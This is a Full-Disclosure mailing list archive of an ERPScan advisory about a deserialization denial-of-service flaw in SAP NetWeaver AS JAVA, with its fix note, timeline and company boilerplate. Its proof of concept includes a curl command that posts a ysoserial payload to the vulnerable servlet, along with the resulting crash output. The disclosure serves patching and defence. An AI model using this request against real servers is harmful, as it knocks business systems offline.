lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 17 Oct 2016 19:13:36 +0300
From: ERPScan inc <erpscan.online@...il.com>
To: submissions@...ketstormsecurity.com, fulldisclosure@...lists.org, 
 pen-test@...urityfocus.com, bugtraq@...urityfocus.com
Subject: [FD] [ERPSCAN-16-029] SAP NetWeaver AS JAVA - deserialization of
 untrusted user value

Application: SAP EP-RUNTIME component

Versions Affected: SAP EP-RUNTIME 7.5

Vendor URL: http://SAP.com

Bugs: Denial of Service

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 12.07.2016

Reference: SAP Security Note  2315788

Author:  Mathieu Geli (ERPScan)



Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-029] SAP NetWeaver AS JAVA – deserialization of
untrusted user value

Advisory ID: [ERPSCAN-16-029]

Risk: High

Advisory URL: https://erpscan.com/advisories/erpscan-16-029-sap-netweaver-java-7-5-deserialization-untrusted-user-value-trustmanagementservlet/

Date published: 12.17.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: Denial of Service

Impact: DoS

Remotely Exploitable: Yes

Locally Exploitable: No


CVSS Information

CVSS Base Score v3:  4.9  / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) High (H)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality None (N)

I : Impact to Integrity None (N)

A : Impact to Availability High (H)



3. VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request in order to force a server
to deserialize evil objects, which results in denial of service.


4. VULNERABLE PACKAGES

SAP EP-RUNTIME component


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2315788


6. AUTHOR

Mathieu Geli (ERPScan)



7. TECHNICAL DESCRIPTION

PoC

Evil object in 'serial.cc3' as an attachment in this bug entry. It was
generated with ysoserial framework, if the commons.collections jar was
in the CLASSPATH we will have direct RCE.

Now, we can only send DoS payloads that will trigger OutOfMemory
exception on 7.5. Payload for that as attachment named 'serial.mem'.


curl -v -XPOST --user 'user:password'
http://172.16.30.29:50000/com.sap.portal.fpn.enterpriseservicesweb.mod/TrustManagementServlet
--data-binary @serial.cc3

This request will trigger a series of exceptions in server's log.

The DoS payload will render the server unstable for some minutes with
following exception:

Server process shutting down with exit code [666] memory allocation
error [OutOfMemoryError]
java.lang.OutOfMemoryError: Requested array size exceeds VM limit
(failed to allocate 8589934576 bytes) (array length 2147483639)


8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 12.07.2016



9. REFERENCES

https://erpscan.com/advisories/erpscan-16-029-sap-netweaver-java-7-5-deserialization-untrusted-user-value-trustmanagementservlet/


10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.



Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ